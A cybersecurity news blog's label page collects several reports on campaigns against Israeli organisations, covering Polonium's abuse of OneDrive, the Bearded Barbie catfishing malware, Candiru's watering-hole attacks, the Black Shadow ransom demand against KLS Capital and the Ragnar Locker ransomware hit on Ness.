Search This Blog

Showing posts with label Israeli Firm. Show all posts

Polonium Assaults Against Israeli Organizations were Blocked by Microsoft

 

Microsoft stated it has banned a hacking gang known as Polonium, based in Lebanon, from utilizing the OneDrive cloud storage platform for data exfiltration and command and control while attacking and compromising Israeli firms. The internet giant's Threat Intelligence Center (MSTIC) stated it stopped over 20 malicious OneDrive apps built by Polonium and alerted affected companies, in addition to erasing the criminal accounts created by the Lebanon-based entity. 

"Across the majority of its victims, this attacker has deployed unique tools that abuse lawful cloud services for command and control (C2)." as per Microsoft's research. "POLONIUM was seen generating and using legal OneDrive accounts, then using those accounts as C2 to carry out part of the offensive operation," says the report. 

POLONIUM has been seen operating on or targeting various organizations previously penetrated by the Iran-linked MuddyWater APT (aka MERCURY). 

Since February 2022, the antagonistic group is thought to have breached more than 20 Israeli institutions and one intergovernmental body with operations in Lebanon. Manufacturing, IT, transportation, defense, government, agriculture, finance, and healthcare companies were among the targets of interest, with one cloud service provider hacked to target a downstream aviation company and law firm in a supply chain attack.

Unpatched Fortinet FortiOS SSL VPN servers vulnerable to CVE-2018-13379 exploits leveraging a critical path traversal weakness allowing login credentials theft appear to represent the first access vector for the vast majority of victims, according to Microsoft. In November 2020, a hacker disclosed the passwords for nearly 50,000 vulnerable Fortinet VPNs, just days after a list of CVE-2018-13379 one-line exploits was publicly disclosed. 

A list of roughly 500,000 Fortinet VPN passwords supposedly harvested from susceptible devices was posted online again almost a year later. The actor's campaign chains have included the usage of proprietary tools that use genuine cloud services like OneDrive and Dropbox accounts for C2 and malicious tools named CreepyDrive and CreepyBox for its victims.

This isn't the first time Iranian threat actors have used cloud services to its advantage. Cybereason revealed in October 2021 that a group called MalKamak organized an attack campaign that use Dropbox for C2 communications to remain under the radar. 

MSTIC also stated that several of the victims penetrated by Polonium had previously been targeted by another Iranian entity known as MuddyWater (aka Mercury), which the US Cyber Command has described as a "subordinate element" under MOIS. The victim overlaps support previous reports that MuddyWater is a "conglomerate" of several teams similar to Winnti (China) and the Lazarus Group (North Korea). 

Customers are encouraged to implement multi-factor authentication as well as analyze and audit partner relations to minimize any superfluous permissions to combat such risks.

Top Israeli Officials Duped by Bearded Barbie Hackers

 

Cybercriminals appear to be aggressively promoting the Remcos RAT that first appeared in hacking forums in 2016 and was marketed sold, and offered cracks on a variety of websites and forums. In 2017, researchers discovered Remcos being distributed via a malicious PowerPoint slideshow with a CVE-2017-0199 exploit. Remcos RAT is a piece of commercial software which may be purchased online. 

An "elaborate effort" targeting high-profile Israeli individuals working in critical defense, law enforcement, and emergency services sectors has been traced to a threat actor associated with Hamas' cyber warfare section. The Hamas-backed hacker outfit dubbed 'APT-C-23' was discovered catfishing Israeli officials in defense, law enforcement, and government institutions, resulting in the deployment of new malware. 

Before delivering spyware, the campaign uses advanced social engineering techniques like creating phony social media identities and maintaining a strong partnership with the targets. AridViper has previously targeted Palestinian law enforcement, military, or educational institutions, as well as the Israel Security Agency, with spear-phishing assaults (ISA). Researchers from Cisco Talos discovered AridViper assaults against activists involved in the Israel-Palestine conflict in February.

Malicious actors have built several phony Facebook pages utilizing forged credentials and pirated or AI-generated photographs of attractive women, and have used these profiles to approach their targets. The operators have spent months curating these profiles to make them appear legitimate, posting in Hebrew and alike organizations and prominent pages in Israel. The creators of these profiles create a network of friends who are actually people who work in Israel's police, defense forces, emergency services, or government. The opponents recommend transferring the chat to WhatsApp, ostensibly for more privacy, after building the target's trust by talking with individuals for a while. 

The Android app is actually the virus VolatileVenom.The icon is concealed on pre-Android 10 devices; with Android 10, the virus utilizes the Google Play installation icon. When the victim tries to sign into the Wink Chat, an error message appears, stating the app will be deleted. With a wide spectrum of espionage capabilities, VolatileVenom continues to function in the background. 

The malicious actors will eventually email the target a RAR file containing supposedly explicit photographs or videos as part of the catfishing attempts. This RAR file, on the other hand, contains the Barb(ie) installer malware, which installs the BarbWire backdoor. The filename of a sample of Barb(ie) detected by Cybereason is "Windows Notifications," and when it is made to run, it performs basic anti-analysis checks. If the host is deemed appropriate, the downloader links to an integrated C2 server. 

The BarbWire Backdoor is sent by the C2 server. The downloader contains a backup technique for finding a different C2. If the attackers need to modify the C2 from the one inserted, they can simply send an SMS message with the new destination. All inbound SMS messages are intercepted by the downloader. If one is provided by the intruders, it can just extract the new C2 information and install the backdoor. BarbWire steals data from PDFs, Office files, archives, picture files, movies, and photos, among other file types. It also checks for external media, such as a CD-ROM file, implying it's hunting for highly sensitive material which is carried around physically or over the internet. The stolen information is stored in a RAR archive and then sent to the attackers' C2 server. 

APT-C-23 employs several approaches which have been used in previous operations against Israeli targets, but it is constantly evolving with new tools and more intricate social engineering efforts. The lack of overlapping infrastructure distinguishes Operation Bearded Barbie from past missions, indicating the group's goal of avoiding notice. Another escalation for the threat actor is the usage of two backdoors, one for Windows and one for Android, resulting in very active espionage for the compromised targets.

Israeli Spyware Firm Attributed to Watering Hole Attacks on Middle East & UK websites

 

ESET researchers have discovered a new cyber campaign that used Candiru's malware, which is located in Tel Aviv, to target websites and services in various Middle Eastern nations, including Saudi Arabia and Iran. 

Candiru, like NSO Group, distributes malware to government agencies, and the US placed it on trade backlists earlier this month, along with a Russian corporation and a Singapore-based company. The latest offensive utilizes 'watering hole' attacks, in which attackers install malicious code on legitimate websites that the targets are likely to visit. When a user visits the page, the malware infects their computer, allowing attackers to eavesdrop on them or harm them in other ways. 

According to ESET, the websites targeted were Middle East Eye, a London-based news organisation, and Almasirah, a Yemeni news agency linked to the Houthi rebels battling the Saudis. Websites belonging to the Iranian foreign ministry, Yemen's finance and interior ministries, and Syria's energy ministry, as well as internet service providers in Syria and Yemen, were also targeted by the attackers. 

Sites run by the Italian corporation Piaggio Aerospace, the pro-Iranian militant group Hezbollah, and The Saudi Reality, a Saudi Arabian dissident media website, were among the other targets. The cybercriminals also established a website that appeared like a medical trade show in Germany, as per researchers. ESET estimates that certain visitors to these sites were targeted via a browser exploit, although they were unable to get the vulnerability or the payload. 

ESET researcher Matthieu Faou who uncovered the cyber campaign, stated, "On July 11, 2020, our system notified us that the website of the Iranian embassy in Abu Dhabi had been tainted with malicious JavaScript code. Our curiosity was aroused by the high-profile nature of the targeted website, and in the following weeks we noticed that other websites with connections to the Middle East were also targeted." 

The researchers have detected no activity from this operation since the end of July 2021, when Google, Citizen Lab, and Microsoft released blog articles outlining Candiru's actions - and about the same time that NSO Group became global news.

"The operators appear to be taking a pause, probably in order to retool and make their campaign stealthier," Faou continued. 

Candiru, which has gone by numerous names since its debut in 2014, has a limited amount of information available. Saito Tech Ltd. is the company's current name, and it has several investors in common with NSO Group.  

In July, Citizen Lab and Microsoft researchers stated that more than 100 journalists, politicians, human rights activists, and dissidents in several countries were targeted in a spyware operation that deployed sophisticated 'cyberweapons' created by Candiru, 

Candiru, according to Citizen Lab, offers spyware to governments and authoritarian leaders only, who then use the tools to hijack PCs, Macs, phones, and cloud accounts. Candiru's clients can attempt to breach an infinite number of devices for €16 million (£13.4 million), but they can only actively track 10 devices at a time, according to the Citizen Lab. Buyers may pay an extra €1.5 million (about £1.25 million) to have Candiru monitor an additional 15 victims.

'Black Shadow' Infiltrates Israeli Finance Firm, Demand $570,000 in Ransom

 

The private information of thousands of Israelis was compromised on Saturday following a cyberattack on the database of a major Israeli financial service firm. The hacking group called ‘Black Shadow’ announced Saturday that it has managed to access the servers of an Israeli financial service firm, KLS capital. 

“We are here to inform you a (sic) cyber-attack against K.L.S CAPITAL LTD which is in Israel. Their servers are down and we have all their clients’ information. We want to leak some part of their data gradually. Part of our negotiation will be published later,” the group wrote on the Telegram app.

The hackers demanded 10 bitcoins ($60,000) in ransom from the Israeli investment firm, but it refused to negotiate. As a result, the hacker group leaked the obtained data on their Telegram channel. Black Shadow is the same hacking group that carried out a major cyberattack against Shirbit insurance company in December. 

A few hours before making the declaration, the hacking group deliberately published blurred images of the identification cards of two people who work with the firm. A few minutes after the announcement, they published a few more documents and have since published dozens of additional documents including identity cards, letters, invoices, images, scanned checks, database information, and much more, including the private information of the CEO of the firm.

Last year in December, a prominent cybersecurity firm reached out to KLS Capital and alerted them of a potential breach, flagging a vulnerability associated with their use of a so-called VPN. They said there was a simple ‘patch’ that could provide a solution; however, it appears that no action was taken at the time.

In response, KLS capital stated: “The Israeli cyber authority reached out to us three days ago to warn us against a looming cyber attack against us. This attack is very similar to other attacks Iran and its proxies have conducted against Israeli targets – including private and public bodies. Our management acted immediately to take down our servers and join forces with the national cyber directorate – which together with our experts are examining the event.” 

In recent months, threat actors targeted several Israeli organizations including Shirbit insurance company, the Amitial software company, Ben-Guiron University of the Negev, and Israel Aerospace Industries.

Threat Actors Attacked Israeli Tech Giant Ness Digital Engineering for Ransom

 

Ness Digital Engineering Company, an Israeli-based U.S. IT provider was targeted via ransomware cyberattack affecting computer networks in India, United States, and Israel too. No official statement has been given to the media by the local authorities but initial reports suggest that there's a high probability of Israel being the source of the attack following Ness branches around the globe.

Shahar Efal, CEO of Ness Israel said that the company’s clients which include government ministries, hospitals, and local municipalities were not compromised in the attack. All our systems had been tested by the experts and there is not a single breach into the company’s network or in its client’s database. Cybersecurity experts say the real issue is that the company’s supply chain is intact or it is breached in the attack, so far there are no reports of negotiations with the threat actors.

“The attack began last night, it is a serious, ongoing event. The company is trying to contain the attack internally and seemed, thus far, to have successfully contained it without risking customers”, a source involved in managing the attack told Ynet. The company reassured its clients by reiterating that Ness Israel was no longer connected to the global corporation and therefore was not affected by the cyberattack.

The company has collaborated with several other companies and government bodies such as the IDF, Israel Aerospace Industries, Israel Post, the Israel Airport Authority, and the Hebrew University. National Cyber Directorate stated this attack has no connection with Israel. Meanwhile, Cybersecurity Consultant Einat Meyron said that more than 150 servers in Israel and 1,000 servers around the globe are tested by McAfee.

A screenshot of the text presented as a part of the ransomware attack reads “Hello ness-digital-engineering! If you (sic) reading this message, it means your network was PENETRATED and all of your files and data has (sic) been ENCRYPTED by RAGNAR LOCKER!” The text directs the company to get in touch via live chat provided in the text to sort out the case and “make a deal”.

Ranger Locker ransomware technique was used by the threat actors to gain access to a victim’s network and perform exploration to locate network assets, backups and other critical files and manually install the ransomware and encrypt the victim’s data.